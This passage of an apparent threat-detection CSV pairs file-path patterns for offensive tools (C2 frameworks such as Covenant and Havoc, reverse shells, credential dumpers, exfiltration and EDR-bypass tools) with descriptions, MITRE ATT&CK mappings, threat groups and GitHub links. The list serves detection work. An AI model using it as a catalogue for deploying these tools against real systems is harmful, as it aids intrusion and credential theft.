APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,1,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*/CoffeeLdr/*,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,1,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*/COFFLoader*,offensive_tool_keyword,cobaltstrike,This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/COFFLoader,1,1,N/A,10,10,386,62,2023-05-15T20:42:41Z,2021-02-19T19:14:43Z -*/COFFLoader2/*,offensive_tool_keyword,cobaltstrike,Load and execute COFF files and Cobalt Strike BOFs in-memory,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/COFFLoader2,1,1,N/A,10,10,156,40,2022-09-13T14:58:30Z,2021-12-14T07:49:17Z -*/collection/screengrab*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*/com/blackh4t/*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*/combine_harvester.git*,offensive_tool_keyword,combine_harvester,Rust in-memory dumper,T1055 - T1055.001 - T1055.012,TA0005 - TA0006,N/A,N/A,Defense Evasion,https://github.com/m3f157O/combine_harvester,1,1,N/A,10,2,101,17,2023-07-26T07:16:00Z,2023-07-20T07:37:51Z -*/comfoo.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/COM-Hunter.csproj*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,1,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*/COM-Hunter.exe*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,1,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*/COM-Hunter.git*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,1,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*/COM-Hunter.sln*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,1,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*/commandcontrol/malware*.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/commando-vm*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,1,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*/commix.git,offensive_tool_keyword,commix,Automated All-in-One OS command injection and exploitation tool.,T1059 - T1053 - T1503,TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/commixproject/commix,1,1,N/A,N/A,10,4034,781,2023-09-29T06:39:41Z,2015-03-20T08:38:26Z -*/commix.py*,offensive_tool_keyword,commix,Automated All-in-One OS command injection and exploitation tool.,T1059 - T1053 - T1503,TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/commixproject/commix,1,1,N/A,N/A,10,4034,781,2023-09-29T06:39:41Z,2015-03-20T08:38:26Z -*/common/beacon.go*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*/common_pass.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*/completions/exegol.fish*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/ComunicationC2.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*/config/doNmapScanWin.bat *,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*/ConPtyShell/*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*/ContainYourself.git*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*/CookieProcessor.cs*,offensive_tool_keyword,cobaltstrike,C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.,T1552.002 - T1027.001 - T1059.003 - T1003.001,TA0006 - TA0005 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF,1,1,N/A,10,10,104,14,2023-05-28T18:41:15Z,2023-05-28T18:30:02Z -*/Cooolis-ms/*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*/core/browser_darwin.go*,offensive_tool_keyword,cobaltstrike,reflective module for HackBrowserData,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/idiotc4t/Reflective-HackBrowserData,1,1,N/A,10,10,148,21,2021-03-13T08:42:18Z,2021-03-13T08:35:01Z -*/core/browser_linux.go*,offensive_tool_keyword,cobaltstrike,reflective module for HackBrowserData,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/idiotc4t/Reflective-HackBrowserData,1,1,N/A,10,10,148,21,2021-03-13T08:42:18Z,2021-03-13T08:35:01Z -*/core/browser_windows.go*,offensive_tool_keyword,cobaltstrike,reflective module for HackBrowserData,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/idiotc4t/Reflective-HackBrowserData,1,1,N/A,10,10,148,21,2021-03-13T08:42:18Z,2021-03-13T08:35:01Z -*/couchdb-databases.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/couchdb-stats.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Covenant*.cs*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/Covenant.git*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/Covenant/*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/CovenantUsers/*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/Cracked5pider/*,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,1,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*/Cracked5pider/*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/cracklord.git*,offensive_tool_keyword,cracklord,Queue and resource system for cracking passwords,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/jmmcatee/cracklord,1,1,N/A,10,4,377,74,2022-09-22T09:30:14Z,2013-12-09T23:10:54Z -*/cracklord/cmd/*,offensive_tool_keyword,cracklord,Queue and resource system for cracking passwords,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/jmmcatee/cracklord,1,1,N/A,10,4,377,74,2022-09-22T09:30:14Z,2013-12-09T23:10:54Z -*/CrackMapExec.git,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/crackmapexec/cme.conf*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/cradle.ps1*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,1,N/A,N/A,N/A,N/A -*/Crassus.git*,offensive_tool_keyword,Crassus,Crassus Windows privilege escalation discovery tool,T1068 - T1003 - T1003.003 - T1046,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/vu-ls/Crassus,1,1,N/A,10,6,503,55,2023-09-29T20:02:02Z,2023-01-12T21:01:52Z -*/Crassus-main*,offensive_tool_keyword,Crassus,Crassus Windows privilege escalation discovery tool,T1068 - T1003 - T1003.003 - T1046,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/vu-ls/Crassus,1,1,N/A,10,6,503,55,2023-09-29T20:02:02Z,2023-01-12T21:01:52Z -*/crawler.py -u http*,offensive_tool_keyword,domain_analyzer,Analyze the security of any domain by finding all the information possible,T1560 - T1590 - T1200 - T1213 - T1057,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/eldraco/domain_analyzer,1,0,N/A,6,10,1831,259,2022-12-29T10:57:33Z,2017-08-08T18:52:34Z -*/createforestcache.py*,offensive_tool_keyword,bloodhound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069,TA0007,N/A,N/A,Frameworks,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*/createstager.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/cred_dump.rc*,offensive_tool_keyword,TheFatRat,Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.,T1027 - T1059 - T1105 - T1218,TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/Screetsec/TheFatRat,1,0,N/A,N/A,10,8267,2217,2023-06-11T19:16:05Z,2016-07-24T10:30:19Z -*/Cred_Dump.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*/credBandit/*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 